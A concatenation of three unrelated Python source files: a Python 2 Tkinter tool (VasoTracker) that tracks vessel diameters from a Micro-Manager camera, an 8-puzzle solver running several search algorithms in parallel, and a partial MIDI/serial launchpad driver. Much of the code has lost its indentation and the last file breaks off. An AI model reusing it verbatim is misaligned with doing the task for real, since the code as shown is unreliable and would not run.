DEVICE = ["ThorCam","ThorlabsUSBCamera","ThorCam"] #camera properties - micromanager creates these in a file
elif camera_label == "FakeCamera":
print "Camera Selected: ", camera_label
DEVICE = ['Camera', 'FakeCamera', 'FakeCamera'] #camera properties - micromanager creates these in a file
elif camera_label == "":
tmb.showinfo("Warning", "You need to select a camera source!")
return
# Set up the camera
mmc.enableStderrLog(False)
mmc.enableDebugLog(False)
mmc.setCircularBufferMemoryFootprint(100)# (in case of memory problems)
mmc.loadDevice(*DEVICE)
mmc.initializeDevice(DEVICE[0])
mmc.setCameraDevice(DEVICE[0])
mmc.setExposure(500)
mmc.setProperty(DEVICE[0], 'PixelType', '8bit')
mmc.setProperty(DEVICE[0], 'Path mask', 'SampleData\\TEST?{4.0}?.tif') #C:\\00-Code\\00 - VasoTracker\\
# To load in a sequence
DEVICE2 = ['Focus', 'DemoCamera', 'DStage']
mmc.loadDevice(*DEVICE2)
mmc.initializeDevice(DEVICE2[0])
mmc.setFocusDevice(DEVICE2[0])
#mmc.snapImage()
#img = mmc.getImage()
#mmc.setProperty("DStage", "Position", 100);
        mmc.setProperty(DEVICE2[0], "Position", 0)
# Class for the main toolbar
class ToolBar(tk.Frame):
def __init__(self,parent):
tk.Frame.__init__(self, parent, height = 150)#, width=250, highlightthickness=2, highlightbackground="#111")
self.parent = parent
self.mainWidgets()
self.set_camera = setCamera(self)
def mainWidgets(self):
self.toolbarview = ttk.Frame(root, relief=RIDGE)
#self.toolbarview.pack(side=LEFT, fill=BOTH, expand=1)
self.toolbarview.grid(row=2,column=2,rowspan=2,sticky=N+S+E+W, pady=ypadding)
# Tool bar groups
source_group = ttk.LabelFrame(self, text='Source', height=150, width=200)
source_group.pack(side=LEFT, anchor=N, padx=3, fill=Y)
outer_diameter_group = ttk.LabelFrame(self, text='Outer Diameter', height=150, width=200)
outer_diameter_group.pack(side=LEFT, anchor=N, padx=3, fill=Y)
inner_diameter_group = ttk.LabelFrame(self, text='Inner Diameter', height=150, width=200)
inner_diameter_group.pack(side=LEFT, anchor=N, padx=3, fill=Y)
acquisition_group = ttk.LabelFrame(self, text='Data acquisition', height=150, width=200)
acquisition_group.pack(side=LEFT, anchor=N, padx=3, fill=Y)
start_group = ttk.LabelFrame(self, text='Start/Stop', height=150, width=200)
start_group.pack(side=LEFT, anchor=N, padx=3, fill=Y)
# Source group (e.g. camera and files)
camera_label = ttk.Label(source_group, text = 'Camera:')
camera_label.grid(row=0, column=0, sticky=E)
path_label = ttk.Label(source_group, text = 'Path:')
path_label.grid(row=1, column=0, sticky=E)
save_label = ttk.Label(source_group, text = 'File:')
save_label.grid(row=2, column=0, sticky=E)
# Flag Start/stop group
self.start_flag = False
def set_cam(self):
if self.start_flag == False:
camera_label = variable.get()
self.set_camera.set(camera_label)
return
else:
print "You can't change the camera whilst acquiring images!"
return
self.camoptions = ["...","Thorlabs","FakeCamera"]
variable = StringVar()
variable.set(self.camoptions[0])
self.camera_entry = ttk.OptionMenu(source_group, variable,self.camoptions[0], *self.camoptions, command= lambda _: set_cam(self))
#camera_entry = ttk.Entry(source_group, width=20)
#camera_entry.insert('0', DEVICE[1])
#camera_entry.config(state=DISABLED)
self.camera_entry.grid(row=0, column=1, pady=5)
global head
global tail
head,tail = os.path.split(self.parent.filename.name)
path_entry = ttk.Entry(source_group, width=20)
path_entry.insert(0, head)
path_entry.config(state=DISABLED)
path_entry.grid(row=1, column=1, pady=5)
save_entry = ttk.Entry(source_group, width=20)
save_entry.insert(0, tail)
save_entry.config(state=DISABLED)
save_entry.grid(row=2, column=1, pady=5)
scale_label = ttk.Label(source_group, text = 'um/pixel:')
scale_label.grid(row=3, column=0, sticky=E)
scale_entry = ttk.Entry(source_group, width=20)
scale = self.parent.multiplication_factor
scalefloat = "%4.2f" % scale
scale_entry.insert('0', scalefloat)
scale_entry.config(state=DISABLED)
scale_entry.grid(row=3, column=1, pady=5)
# Outer diameter group
# Function for the labels
def coord_label(window, text, row, column):
label=ttk.Label(window, text=text)
label.grid(row=row, column=column, padx = 1, sticky=E)
# Function for the labels 2
def coord_entry(window, row, column, coord_label):
entry = ttk.Entry(window, width=8, textvariable=coord_label)
entry.config(state=NORMAL)
entry.grid(row=row, column=column, padx=1, sticky=E)
root.focus_set()
entry.focus_set()
root.focus_force()
return entry
def set_button(window):
set_button = ttk.Button(window, text='Set', command= lambda: coord_limits(get_coords=True, default = False))
set_button.grid(row=3, columnspan=4, pady=5)
def set_button_function(get_coords):
if get_coords == True:
self.coord_limits()
if get_coords == False:
pass
def coord_limits(get_coords, default):
if get_coords == True:
if default:
self.xlims = (self.x_min_default, self.x_max_default)
self.ylims = (self.y_min_default, self.y_max_default)
outer_xmin_entry.delete(0, END), outer_xmax_entry.delete(0, END)
outer_xmin_entry.insert('0', self.x_min_default), outer_xmax_entry.insert('0', self.x_max_default)
outer_ymin_entry.delete(0, END), outer_ymax_entry.delete(0, END)
outer_ymin_entry.insert('0', self.y_min_default), outer_ymax_entry.insert('0', self.y_max_default)
else:
self.xlims = (self.x_min_label.get(),self.x_max_label.get())
self.ylims = (self.y_min_label.get(),self.y_max_label.get())
print "XLIMS_TRUE_SET = ", self.xlims
return self.xlims, self.ylims
get_coords = False
else:
pass
# Set the initial xlimit values
self.x_min_label, self.x_max_label = IntVar(value=-600), IntVar(value=0)
self.x_min_default, self.x_max_default = self.x_min_label.get(),self.x_max_label.get()
# Set the initial xlimit values
self.y_min_label, self.y_max_label = IntVar(value=100), IntVar(value=250)
self.y_min_default, self.y_max_default = self.y_min_label.get(),self.y_max_label.get()
# Get the x and y limits
self.xlims = (self.x_min_label.get(),self.x_max_label.get())
self.ylims = (self.y_min_label.get(),self.y_max_label.get())
outer_xmin_label = coord_label(outer_diameter_group, 'X-Min:', 1, 0)
outer_xmax_label = coord_label(outer_diameter_group, 'X-Max:', 2, 0)
outer_ymin_label = coord_label(outer_diameter_group, 'Y-Min:', 1, 2)
outer_ymax_label = coord_label(outer_diameter_group, 'Y-Max:', 2, 2)
outer_xmin_entry = coord_entry(outer_diameter_group, 1, 1, self.x_min_label)
outer_xmax_entry = coord_entry(outer_diameter_group, 2, 1, self.x_max_label)
outer_ymin_entry = coord_entry(outer_diameter_group, 1, 3, self.y_min_label)
outer_ymax_entry = coord_entry(outer_diameter_group, 2, 3, self.y_max_label)
outer_set_button = set_button(outer_diameter_group)
# Button to set the axis limits to the default values
set_button = ttk.Button(outer_diameter_group, text='Default', command= lambda: coord_limits(get_coords=True, default = True))
set_button.grid(row=4, columnspan=4, pady=5)
#********** Inner Diameter Group **********
def set_button2(window):
set_button = ttk.Button(window, text='Set', command= lambda: coord_limits2(get_coords=True, default = False))
set_button.grid(row=3, columnspan=4, pady=5)
def set_button_function(get_coords):
if get_coords == True:
self.coord_limits2()
if get_coords == False:
pass
def coord_limits2(get_coords, default):
if get_coords == True:
if default:
self.xlims2 = (self.x_min_default2, self.x_max_default2)
self.ylims2 = (self.y_min_default2, self.y_max_default2)
inner_xmin_entry.delete(0, END), inner_xmax_entry.delete(0, END)
inner_xmin_entry.insert('0', self.x_min_default2), inner_xmax_entry.insert('0', self.x_max_default2)
inner_ymin_entry.delete(0, END), inner_ymax_entry.delete(0, END)
inner_ymin_entry.insert('0', self.y_min_default2), inner_ymax_entry.insert('0', self.y_max_default2)
else:
self.xlims2 = (self.x_min_label2.get(),self.x_max_label2.get())
self.ylims2 = (self.y_min_label2.get(),self.y_max_label2.get())
print "Inner XLIMS_TRUE_SET = ", self.xlims2
return self.xlims2, self.ylims2
get_coords = False
else:
pass
# Set the initial xlimit values
self.x_min_label2, self.x_max_label2 = IntVar(value=-600), IntVar(value=0)
self.x_min_default2, self.x_max_default2 = self.x_min_label2.get(),self.x_max_label2.get()
# Set the initial xlimit values
self.y_min_label2, self.y_max_label2 = IntVar(value=50), IntVar(value=200)
self.y_min_default2, self.y_max_default2 = self.y_min_label2.get(),self.y_max_label2.get()
# Get the x and y limits
self.xlims2 = (self.x_min_label2.get(),self.x_max_label2.get())
self.ylims2 = (self.y_min_label2.get(),self.y_max_label2.get())
inner_xmin_label = coord_label(inner_diameter_group, 'X-Min:', 1, 0)
inner_xmax_label = coord_label(inner_diameter_group, 'X-Max:', 2, 0)
inner_ymin_label = coord_label(inner_diameter_group, 'Y-Min:', 1, 2)
inner_ymax_label = coord_label(inner_diameter_group, 'Y-Max:', 2, 2)
inner_xmin_entry = coord_entry(inner_diameter_group, 1, 1, self.x_min_label2)
inner_xmax_entry = coord_entry(inner_diameter_group, 2, 1, self.x_max_label2)
inner_ymin_entry = coord_entry(inner_diameter_group, 1, 3, self.y_min_label2)
inner_ymax_entry = coord_entry(inner_diameter_group, 2, 3, self.y_max_label2)
inner_set_button = set_button2(inner_diameter_group)
# Button to set the axis limits to the default values
set_button = ttk.Button(inner_diameter_group, text='Default', command= lambda: coord_limits2(get_coords=True, default = True))
set_button.grid(row=4, columnspan=4, pady=5)
# acquisition_group
def coord_label(window, text, row, column):
label=ttk.Label(window, text=text)
label.grid(row=row, column=column, padx = 1, sticky=E)
temp_label = ttk.Label(acquisition_group, text = 'Temp (oC):')
temp_label.grid(row=0, column=0, sticky=E)
pressure_label = ttk.Label(acquisition_group, text = 'Pressure (mmHg):')
pressure_label.grid(row=1, column=0, sticky=E)
temp_entry = ttk.Entry(acquisition_group, width=20)
temp_entry.insert(0, "37")
temp_entry.config(state=DISABLED)
temp_entry.grid(row=0, column=1, pady=5)
pressure_entry = ttk.Entry(acquisition_group, width=20)
pressure_entry.insert(0, "60")
pressure_entry.config(state=DISABLED)
pressure_entry.grid(row=1, column=1, pady=5)
# Function that will start the image acquisition
def start_acq():
if variable.get() == "...":
tmb.showwarning(title="Warning", message = "You need to select a camera source!")
self.start_flag = False
else:
self.camera_entry.configure(state="disabled")
print self.start_flag
self.start_flag = True
print self.start_flag
mmc.startContinuousSequenceAcquisition(1000)
return self.start_flag
# Function that will stop the image acquisition
def stop_acq():
self.camera_entry.configure(state="enabled")
print self.start_flag
self.start_flag = False
print self.start_flag
mmc.stopSequenceAcquisition()
return self.start_flag
# Function that will start the data acquisition
self.record_flag = False
def record_data():
self.record_flag = True
print "Just set the record flag to: ", self.record_flag
return self.record_flag
start_button = ttk.Button(start_group, text='Start', command= lambda: start_acq())
start_button.grid(row=0, column=0, pady=5, sticky=N+S+E+W)
#console = tk.Button(master, text='Exit', command=self.close_app)
#console.pack( )
live_button = ttk.Button(start_group, text='Stop', command= lambda: stop_acq())
live_button.grid(row=1, column=0, pady=5, sticky=N+S+E+W)
record_button = ttk.Button(start_group, text='Record', command= lambda: record_data())
record_button.grid(row=3, column=0, pady=5, sticky=N+S+E+W)
self.record_is_checked = IntVar()
record_video_checkBox = ttk.Checkbutton(start_group, text='Record Video', onvalue=1, offvalue=0, variable=self.record_is_checked)
record_video_checkBox.grid(row=4, columnspan=2, padx=5, pady=3, sticky=W)
class GraphFrame(tk.Frame):
min_x = 0
max_x = 10
def __init__(self,parent):
tk.Frame.__init__(self, parent, highlightthickness=2, highlightbackground="#111")
self.parent = parent
self.top = Frame()
self.top.update_idletasks()
self.n_points = 100000
self.xlim1 = self.parent.toolbar.x_min_default # Outer
self.xlim2 = self.parent.toolbar.x_max_default # Outer
self.ylim1 = self.parent.toolbar.y_min_default # Outer
self.ylim2 = self.parent.toolbar.y_max_default # Outer
self.xlim3 = self.parent.toolbar.x_min_default2 # Inner
self.xlim4 = self.parent.toolbar.x_max_default2 # Inner
self.ylim3 = self.parent.toolbar.y_min_default2 # Inner
self.ylim4 = self.parent.toolbar.y_max_default2 # Inner
self.delta_i = 1
self.n_data = 100000000
self.update = 1
self.timeit = TimeIt()
self.mainWidgets()
def mainWidgets(self,blit=False):
self.graphview = tk.Label(self)
self.graphview.figure,(self.graphview.ax1,self.graphview.ax2) = plt.subplots(2,1)
#self.graphview.figure = pyplot.figure()
#self.graphview.ax1 = self.graphview.figure.add_subplot(211)
#self.graphview.ax2 = self.graphview.figure.add_subplot(212)
self.graphview.line, = self.graphview.ax1.plot([],[]) # initialize line to be drawn
self.graphview.line2, = self.graphview.ax2.plot([],[])
self.graphview.ax1.set_xlim(self.xlim1,self.xlim2) # Outer
self.graphview.ax2.set_xlim(self.xlim3,self.xlim4) # Inner
self.graphview.ax1.set_ylim(self.ylim1,self.ylim2) # Outer
self.graphview.ax2.set_ylim(self.ylim3,self.ylim4) # Inner
#self.graphview.ax1.set_xlabel('Time (s)', fontsize=14) # Outer diameter labels
self.graphview.ax1.set_ylabel('Outer diameter (um)', fontsize=14) # Outer diameter labels
self.graphview.ax2.set_xlabel('Time (s)', fontsize=14) # Inner diameter labels
self.graphview.ax2.set_ylabel('Lumen diameter (um)', fontsize=14) # Inner diameter labels
self.graphview.figure.canvas.draw()
self.graphview.figure.canvas = FigureCanvasTkAgg(self.graphview.figure, self)
self.graphview.figure.canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
if blit:
# Get the background
self.ax1background = self.graphview.figure.canvas.copy_from_bbox(self.graphview.ax1.bbox)
self.ax2background = self.graphview.figure.canvas.copy_from_bbox(self.graphview.ax2.bbox)
def on_running(self, xdata, ydata1,ydata2,xlims,ylims, xlims2,ylims2,blit=False):
# Set the axis values
self.graphview.ax1.set_xlim(xlims[0],xlims[1]) # Outer diameter
self.graphview.ax1.set_ylim(ylims[0],ylims[1]) # Outer diameter
self.graphview.ax2.set_xlim(xlims2[0],xlims2[1]) # Inner diameter
self.graphview.ax2.set_ylim(ylims2[0],ylims2[1]) # Inner diameter
# Subtract off the latest time point, so that the current time is t = 0
xdata = [el-xdata[-1] for el in xdata]
# Make every 7th point different so we can see when plotting
#ydata1 = [t if k%7 else t-10 for k,t in enumerate(ydata1)]
#ydata2 = [t if k%7 else t-10 for k,t in enumerate(ydata2)]
# Get the xdata points that fit within the axis limits
xdata3 = [el for el in xdata if el > xlims[0]]
# Get the corresponding ydata points
ydata1A = ydata1[::-1]
ydata1B = ydata1A[0:len(xdata3)]
ydata1C = ydata1B[::-1]
ydata2A = ydata2[::-1]
ydata2B = ydata2A[0:len(xdata3)]
ydata2C = ydata2B[::-1]
#ydata1 = [el2 for (el1,el2) in zip(xdata,ydata1) if el1 > self.xlim1-5] # For some reason this did not work
#ydata2 = [el2 for (el1,el2) in zip(xdata,ydata2) if el1 > self.xlim1-5] # For some reason this did not work
# If there are many data points, it is a waste of time to plot all
# of them once the screen resolution is reached,
# so when the maximum number of points is reached,
# halve the number of points plotted. This is repeated
# every time the number of data points has doubled.
self.i = int(len(xdata3))
'''
if self.i == self.n_points :
self.n_points *= 2
# frequency of plotted points
self.delta_i *= self.n_points/self.i
self.update = max(self.delta_i, self.update)
print("updating n_rescale = ",\
self.n_points, self.update, self.delta_i)
'''
# drawing the canvas takes most of the CPU time, so only update plot
# every so often
if blit == False:
if self.i == self.n_data-1 or not (self.i % self.update) :
self.graphview.ax1.lines.remove(self.graphview.line)
self.graphview.ax2.lines.remove(self.graphview.line2)
self.graphview.line, = self.graphview.ax1.plot(
xdata3[::-1][0::int(self.delta_i)][::-1],
ydata1C[::-1][0::int(self.delta_i)][::-1],
color="blue", linewidth = 3)
self.graphview.line2, = self.graphview.ax2.plot(
xdata3[::-1][0::int(self.delta_i)][::-1],
ydata2C[::-1][0::int(self.delta_i)][::-1],
color="red", linewidth = 3)
with self.timeit:
self.graphview.figure.canvas.draw()
self.graphview.figure.canvas.get_tk_widget().update_idletasks()
#self.after(2,self.plotter)
#self.graphview.figure.canvas.flush_events()
if blit == True:
with self.timeit:
self.graphview.figure.canvas.restore_region(self.ax1background)
self.graphview.figure.canvas.restore_region(self.ax2background)
try:
self.graphview.ax1.lines.remove(self.graphview.line)
self.graphview.ax2.lines.remove(self.graphview.line2)
except:
pass
self.graphview.line.set_xdata(xdata3[::-1][0::int(self.delta_i)][::-1])
self.graphview.line.set_ydata(ydata1C[::-1][0::int(self.delta_i)][::-1])
self.graphview.line2.set_xdata(xdata3[::-1][0::int(self.delta_i)][::-1])
self.graphview.line2.set_ydata(ydata2C[::-1][0::int(self.delta_i)][::-1])
# redraw just the points
self.graphview.ax1.draw_artist(self.graphview.line)
self.graphview.ax2.draw_artist(self.graphview.line2)
# fill in the axes rectangle
self.graphview.figure.canvas.blit(self.graphview.ax1.bbox)
self.graphview.figure.canvas.blit(self.graphview.ax2.bbox)
self.graphview.figure.canvas.draw_idle()
#self.graphview.figure.canvas.flush_events()
#self.graphview.figure.canvas.update()
#self.graphview.figure.canvas.flush_events()
#self.graphview.figure.canvas.get_tk_widget().update_idletasks()
#Example
def plot(self, timelist, outers, inners,xlims,ylims, xlims2, ylims2):
# Get the data
xdata = timelist # Time
ydata1 = outers # Outer diameter
ydata2 = inners # Inner diameter
xlims = xlims # Outer diameter
ylims = ylims # Outer Diameter
xlims2 = xlims2 # Inner diameter
ylims2 = ylims2 # Inner diameter
if len(xdata)>1:
self.on_running(xdata, ydata1,ydata2,xlims,ylims,xlims2,ylims2)
return
# Class for timing processes
class TimeIt():
from datetime import datetime
def __enter__(self):
self.tic = self.datetime.now()
def __exit__(self, *args, **kwargs):
print('runtime: {}'.format(self.datetime.now() - self.tic))
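# Usage sketch for TimeIt (illustration only, not part of the original flow):
# wrapping a block in the context manager prints its runtime, e.g.
#
#   timer = TimeIt()
#   with timer:
#       some_expensive_drawing_call()   # hypothetical placeholder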
class TableFrame(tk.Frame):
def __init__(self,parent):
tk.Frame.__init__(self, parent, width=250, height = 300)#, highlightthickness=2, highlightbackground="#111")
self.parent = parent
self.mainWidgets()
def mainWidgets(self):
self.tableview = ttk.Frame(self)
self.tableview.grid(row=0, column=0, sticky=N+S+E+W)
try:
OutDiam = float(self.parent.processIncoming.OD)
InDiam = float(self.parent.processIncoming.ID)
except:
pass
P1 = '60'
P2 = '60'
def add_row():
try:
OutDiam = float(OD)
InDiam = float(ID)
initOutDiam, initInDiam = float(initOD), float(initID)
Label = table_text_entry.get()
Time = (time.time() - start_time)
Time = float(Time)
Time = round(Time, 1)
mxDiastring = StringVar()
max_diameter_text.set(str(initOutDiam))
max_diameter = initOutDiam
#max_diameter = max_diameter_text.set()
#max_diameter = int(max_diameter)
if max_diameter > 0:
max_diameter = float(max_diameter)
max_percent = ((float(OutDiam/max_diameter))*100)
max_percent = round(max_percent, 1)
table_1.insert('', 'end', values=(Time, Label, OutDiam, P1, P2, max_percent))
else:
max_percent = '-'
table_1.insert('', 'end', values=(Time, Label, OutDiam, P1, P2, max_percent))
hello = Label
save_table(hello)
table_1.yview_moveto(1)
except ValueError:
max_percent = '-'
table_1.insert('', 'end', values=(Time, Label, OutDiam, P1, P2, max_percent))
hello = ((Time, Label, OutDiam, P1, P2))
print hello
save_table(hello)
table_text_entry = StringVar()
max_diameter_text = StringVar()
def save_table(hello):
with open((self.parent.txt_file), 'ab') as g:
w=csv.writer(g, quoting=csv.QUOTE_ALL)
w.writerow(hello)
table_text_entry = StringVar()
max_diameter_text = StringVar()
table_2 = tk.Frame(self.tableview)
table_2.grid(row=0, column=0, columnspan=5, sticky=N+S+E+W)
table_label = ttk.Label(table_2, text = 'Label:')
table_label.grid(row=0, column=0)
table_entry = ttk.Entry(table_2, width=30, textvariable=table_text_entry )
table_entry.grid(row=0, column=1)
add_button = ttk.Button(table_2, text='Add', command=add_row)
add_button.grid(row=0, column=2)
max_diameter_label = ttk.Label(table_2, text='Initial Diameter:')
max_diameter_label.grid(row=0, column=3)
max_diameter_entry = ttk.Entry(table_2, width=5, textvariable=max_diameter_text )
max_diameter_entry.grid(row=0, column=4)
table_1 = ttk.Treeview(self.tableview, show= 'headings')
table_1["columns"] = ('Time', 'Label', 'Diameter', 'Pressure 1', 'Pressure 2', '% Initial')
table_1.column('#0', width=30)
table_1.column('Time', width=100, stretch=True)
table_1.column('Label', width=150)
table_1.column('Diameter', width=100)
table_1.column('Pressure 1', width=100)
table_1.column('Pressure 2', width=100)
table_1.column('% Initial', width=50)
table_1.heading('#1', text = 'Time')
table_1.heading('#2', text = 'Label')
table_1.heading('#3', text = 'Diameter')
table_1.heading('#4', text = 'Pressure 1')
table_1.heading('#5', text = 'Pressure 2')
table_1.heading('#6', text = '% Initial')
scrollbar = Scrollbar(self.tableview)
scrollbar.grid(row=1,column=2, sticky=NS)
scrollbar.config( command = table_1.yview )
table_1.grid(row=1, column=1, sticky=N+S+E+W)
class CameraFrame(tk.Frame):
def __init__(self,parent):
tk.Frame.__init__(self, parent, width=250, height = 300)#, highlightthickness=2, highlightbackground="#111")
self.parent = parent
self.mainWidgets()
def mainWidgets(self):
self.cameraview = tk.Label(self)
self.cameraview.grid(row=2,column=2,sticky=N+S+E+W, pady=ypadding)
def process_queue(self,params,img):
try:
img = img
imgc = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)
timenow,OD1,OD2,ID1,ID2,OuterD,start = params
if self.parent.toolbar.record_flag:
# Draw the diameters:
for m,OD in enumerate(OD1):
pos = m*start+start
#Horizontal lines
imgc = cv2.line(imgc,(OD1[m],pos),(OD2[m],pos),(255,0,0),4) #in opencv rgb is bgr
imgc = cv2.line(imgc,(ID2[m],pos),(ID1[m],pos),(0,0,255),2) #in opencv rgb is bgr
#Vertical lines
imgc = cv2.line(imgc,(OD2[m],pos-5),(OD2[m],pos+5),(255,0,0),4) #in opencv rgb is bgr
imgc = cv2.line(imgc,(OD1[m],pos-5),(OD1[m],pos+5),(255,0,0),4) #in opencv rgb is bgr
imgc = cv2.line(imgc,(ID2[m],pos-5),(ID2[m],pos+5),(0,0,255),2) #in opencv rgb is bgr
imgc = cv2.line(imgc,(ID1[m],pos-5),(ID1[m],pos+5),(0,0,255),2) #in opencv rgb is bgr
cv2.putText(imgc, 't=%.2f seconds' %timenow,(20,30), cv2.FONT_HERSHEY_SIMPLEX, 0.5,(255,255,255),1,cv2.LINE_AA)
if self.parent.toolbar.record_is_checked.get() == 1 and self.parent.count%60 == 0:
timenow2 = int(timenow)
gfxPath = os.path.join(head, '%s_t=%ss_Result.tiff' % (os.path.splitext(tail)[0],timenow2))
cv2.imwrite(gfxPath,imgc)
imgc = cv2.cvtColor(imgc, cv2.COLOR_BGR2RGBA)
prevImg = Image.fromarray(imgc)
imgtk = ImageTk.PhotoImage(image=prevImg)
#Show the image
self.cameraview.configure(image=imgtk)
            self.cameraview.image = imgtk # Keep a reference, otherwise the image flickers because it gets garbage collected
except:
pass
class Calculate_Diameter(object):
def __init__(self,image,multiplication_factor):
image = image
#print "working out the diameter"
def calc(self,image,multiplication_factor):
# Set up some parameters
ny,nx = image.shape
number,navg = 25,10
start = int(np.floor(ny/(number+1)))
end = number*start
thresh = 0
# The multiplication factor
scale = multiplication_factor
# Slice the image
data = [np.average(image[y-int(navg/2):y+int(navg/2),:], axis=0) for y in range(start,end+start,start)]
data2 = np.array(data)
#Smooth the datums
window = np.ones(11,'d')
smoothed = [np.convolve(window / window.sum(), sig, mode = 'same') for sig in data2]
#Differentiate the datums
ddts = [VTutils.diff(sig, 1) for sig in smoothed]
# Loop through each derivative
outer_diameters1,outer_diameters2,inner_diameters1,inner_diameters2,OD,ID = VTutils.process_ddts(ddts,thresh,nx,scale)
#Return the data
return(outer_diameters1,outer_diameters2,inner_diameters1,inner_diameters2,OD,ID,start)
class ThreadedClient:
"""
Launch the main part of the GUI and the worker thread. periodicCall and
endApplication could reside in the GUI part, but putting them here
means that you have all the thread controls in a single place.
"""
def __init__(self, master):
"""
Start the GUI and the asynchronous threads. We are in the main
(original) thread of the application, which will later be used by
the GUI as well. We spawn a new thread for the worker (I/O).
"""
#threading.Thread.daemon = True # Make sure the thread terminates on exit
self.master = master
# Create the queue
self.queue = Queue.Queue( )
# Set up the GUI part
self.gui = GuiPart(master, self.queue, self.endApplication)
# Set up the thread to do asynchronous I/O
# More threads can also be created and used, if necessary
self.running = 1
self.thread1 = threading.Thread(target=self.workerThread1)
#self.thread1.deamon = True
self.thread1.start( )
# Start the periodic call in the GUI to check if the queue contains
# anything
self.outers = []
self.inners = []
self.timelist = []
self.periodicCall( )
def periodicCall(self):
"""
Check every 10 ms if there is something new in the queue.
"""
if self.running:
            self.gui.processIncoming(self.outers, self.inners, self.timelist)
if not self.running:
# This is the brutal stop of the system. You may want to do
# some cleanup before actually shutting it down.
import sys
sys.exit(1)
if self.running:
self.master.after(10, self.periodicCall)
def workerThread1(self):
"""
This is where we handle the asynchronous I/O. For example, it may be
a 'select( )'. One important thing to remember is that the thread has
to yield control pretty regularly, by select or otherwise.
"""
while self.running:
if(self.queue.empty()):
try: # Catch exception on closing the window!
                    # Check if there is an image in the buffer, or an image acquisition in progress
if (mmc.getRemainingImageCount() > 0 or mmc.isSequenceRunning()):
#Check if there is an image in the buffer
if mmc.getRemainingImageCount() > 0:
timenow = time.time() - start_time #Get the time
img = mmc.popNextImage() # Get the next image.
self.queue.put(img) # Put the image in the queue
except:
pass
def endApplication(self):
try:
mmc.stopSequenceAcquisition()
mmc.reset()
except:
pass
self.running = 0
#sys.exit()
root.quit()
        root.destroy()
if __name__ == "__main__":
global start_time
start_time=time.time()
# Set up the camera
mmc = MMCorePy.CMMCore()
# Create the main window
rand = random.Random( )
root = tk.Tk( )
root.iconbitmap('ICON.ICO')
root.attributes('-topmost',True)
root.after_idle(root.attributes,'-topmost',False)
root.wm_title("VasoTracker") #Makes the title that will appear in the top left
#Set the size and/or position
#root.wm_state('zoomed')
root.state("zoomed")
#root.resizable(0,0) # Remove ability to resize
#root.overrideredirect(True)
#top = Toplevel(root)
#root.overrideredirect(1) #hides max min buttons and the big x
# Go go go!
client = ThreadedClient(root)
root.mainloop( )
|
solver.py
|
import time
from copy import deepcopy
from multiprocessing import Process
import numpy as np
import libs.arg_parse_config as APC
import libs.astar as ASTAR
import libs.bfs as BFS
import libs.gfs as GFS
import libs.hc as HC
import libs.ids as IDS
import libs.puzzle as PUZZLE
import libs.state_node as STTREE
import libs.ucs as UCS
def execute(algName, algObject, output_path):
start = time.time()
print("\nExecuting %s..." % algName)
answerNode, exps, cost = algObject.execute()
print("\n%s completed." % algName)
end = time.time()
answerNode.printAnswerPath(algName, exps, cost, end - start, output_path)
args = APC.parser()
puzzle = PUZZLE.Puzzle(args.input_file)
answer = PUZZLE.AnswerPuzzle(puzzle.n)
astar = ASTAR.AStar(deepcopy(puzzle), deepcopy(answer))
astarProcess = Process(target=execute, args=("A* Search", astar, args.output_path))
if not args.a_star_only:
bfs = BFS.BreadthFirstSearch(deepcopy(puzzle), deepcopy(answer))
bfsProcess = Process(
target=execute, args=("Breadth-First Search", bfs, args.output_path)
)
ucs = UCS.UniformCostSearch(deepcopy(puzzle), deepcopy(answer))
ucsProcess = Process(
target=execute, args=("Uniform-Cost Search", ucs, args.output_path)
)
ids = IDS.IterativeDeepeningSearch(deepcopy(puzzle), deepcopy(answer))
idsProcess = Process(
target=execute, args=("Iterative Deepening Search", ids, args.output_path)
)
hc = HC.HillClimbing(deepcopy(puzzle), deepcopy(answer), args.k_hill_climbing)
hcProcess = Process(
target=execute,
args=("Hill Climbing with Lateral Movements Search", hc, args.output_path),
)
gfs = GFS.GreedyFirstSearch(deepcopy(puzzle), deepcopy(answer))
gfsProcess = Process(
target=execute, args=("Greedy Best-First Search", gfs, args.output_path)
)
# Starts processes
astarProcess.start()
if not args.a_star_only:
bfsProcess.start()
ucsProcess.start()
idsProcess.start()
hcProcess.start()
gfsProcess.start()
# Wait for processes to join
astarProcess.join()
if not args.a_star_only:
bfsProcess.join()
ucsProcess.join()
idsProcess.join()
hcProcess.join()
gfsProcess.join()
|
rboxdriver.py
|
import threading, sys, midi_driver, json, pyautogui
from main import resource_path
from time import sleep
from textwrap import wrap
from debug import printd
from ahk import AHK
#Class called from main
class RBoxTask:
def __init__(self, port:str, midiout:int, midiin:int):
self.__running = False
self.config = None
#call midi controller
self.midi = midi_driver.MidiController(midiout, midiin)
#call serial controller
self.pi = midi_driver.SerialController(port)
self.query = []
#get index of button determined by the midi config
def get_index(self, s:str):
for conf in self.config:
if(conf[1] == s):
return self.config.index(conf)
return None
#engine for handling button presses
def run_data_engine(self):
printd("START MAIN ENGINE")
while True:
if not self.__running: break #close process when __running is false
            button = self.pi.read_button() #read button input from USB
if(button != None):
if(button < 16 and button >= 0):
printd(f"Motion trigger: Button ID {button}")#debug
s = f"{self.config[button][0]}{self.config[button][1]}{self.config[button][2]}"
payload = bytes.fromhex(s)
printd(f"generated payload: {payload.hex()}")#debug
self.midi.connection.write_short(payload[0], payload[1], payload[2]) #write to midi port
printd("STOP MAIN ENGINE")
    #puts midi signals received into the query
#this process runs twice to ensure all data is captured
def run_rgb_engine(self):
printd("START RGB ENGINE")
while self.__running:
if(self.midi.input.poll()):
data = self.midi.input.read(1)
self.query.append(data)
#printd(data)#debug
#printd(type(data[0][0][0]))
printd("STOP RGB ENGINE")
#process that handles the query
def run_query_engine(self):
printd("START QUERY ENGINE")
while self.__running:
data = 0
if(len(self.query) > 0):
dataquery = self.query[0]
data = wrap(bytearray(dataquery[0][0]).hex(), 2)[:-1]
print(data)
if(data == 0):
continue
if(data[0] == "90"): #only NoteOn messages will be interpreted as RGB signals
index = self.get_index(data[1]) #get button index to send to launchpad
printd(f"GOT RGB SIGNAL: Button {data[1]}, pallette {data[2]}\nIndex >> {index}")#debug
if (index != None):
#relay message to launchpad
self.pi.send_rgb(index, int(data[2], 16))
if(len(self.query) > 0):
self.query.pop(0)
sleep(0.002) #sleep for 2ms
printd("STOP QUERY ENGINE")
    #library used for multiprocessing purposes. The RBOX has two engines for handling input so it can receive the signals more precisely
    #there is a bug where one process is failing, that's why I will be switching the engine to Rust soon
def start(self, config):
self.__running = True
self.config = config
#start engine for handling button inputs
self.dataengine = threading.Thread(target=self.run_data_engine)
